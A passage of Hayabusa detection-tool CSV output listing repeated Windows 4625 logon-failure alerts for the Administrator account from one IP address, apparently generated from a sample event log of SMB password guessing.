+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nqCCiK5arcyRHha6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.749 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpyTGZLkAb0w0kgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.789 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wa2pXrZKxeZZYKAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.900 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dK0N5KeBgCze1YWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.029 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g4dHlwZjMzI5wU2s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.075 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GzF2ouP5KkRfsxnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:40.109 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSQxMrGlDiAOo6ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gL0rz3p1yG6RhfAT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyChoTSKgJeK6yqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.234 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG4I11dwpBM9SM3l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.276 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7foAZ5Y1igCbHap | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.327 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ATDXUljQwg8WvUVs | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.373 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdmXaJqQMAG2g6Ao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.413 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bjame5puT5CDeoIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.454 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0FGGVVkckmdURVh6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.485 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j0Smqw4cA4wG2Q6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLWloOhUYEQlj6y6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.569 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Tuxuykh0j5afeTH | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.609 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeXS6QwYhqJAOeuz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.666 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AqFSJCq5bmBW6dj1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.718 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DH1zyt1hxTgzajhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.761 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rrZxcWjUX4OgYYIb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.807 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ExtkYXSJI8F41uvw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.845 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
sLh1Q3RieOoukiCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.881 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kNb2hZDxi4QrbQpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.923 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCb1TMlFj2PjH2sA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.973 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rgF42C57Nx6F3HU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.005 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KZfFH9geIrxVYowJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.039 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWz1XeyxywR0o5gS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.083 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: og1kItEC6WhqXF37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.121 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0KhaJlD6tWwF2ky | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.165 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUy0EKmjyD6ZYENA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.217 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h3MdGstPPFJDGzwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.264 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTs0ZQa6LGrKZKsY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.304 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FefzWjMXSvMdvqcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.345 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: hlnUt9tPRSXR5mWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.384 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dehb4M6pcxi56Bkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tLXHvGiUqZyxax4W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.473 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP1gKcf1eeKm0RB1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.525 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldbN1odP77n0BOzO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.562 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: drRC8qCbPe5e4mdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.607 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: lBg39AUtzZi6Q4iz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.650 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huv5YEPo1n7UiFkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.693 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9CLLwao1NDtBulxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.732 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SB88EHHhDWhvJI87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.782 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBvklueV4MZo3pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.828 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: noha7Vw85VfURHik | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.861 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wl5eIYvoKpJGUcSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.921 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsS3JTLUWcFYvxAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.957 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM6hj2bGxC124oZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.005 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3IQkVcY5iMTxCRN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.045 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v44Kp3lpGKb6Xd4j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.082 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1skdEmGlXbzUWk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:42.181 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feaA6lAxWjapFbAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.220 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJZjTqY5innWcvSZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.273 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymXIp0KTw0vIbB0N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpPJEcLv7BoZaQwT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cz14Cv861RhFh0Pa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H8BklDHdS0cdcbGu | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0m5Mznl2khRMj31V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.472 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ha6TuN7C8V0roSAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.517 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9oBW0yE5a9zSkpIH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.566 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n54EaKOUQIX9geqx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.617 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m6WCg3o4oatO42wW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.656 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KfCwo8ZUWiBqI8zC | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.692 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8potisENMIsbNxcd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.732 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgagMNj95dkg9uQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1EVsGLFugwePvgR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q00SeueJQAiBGpe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.861 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWzSR1cJ2XJNirSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.904 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
39MY5ZvRJSHVkZZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.944 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WyOdltctwdHNkH6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.989 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUcWk0xJn9zVMZSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.023 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2sauqNlJi3y0ZBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkih5QcLlcjw9gjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.104 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3KlUJslcpS9jhLY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
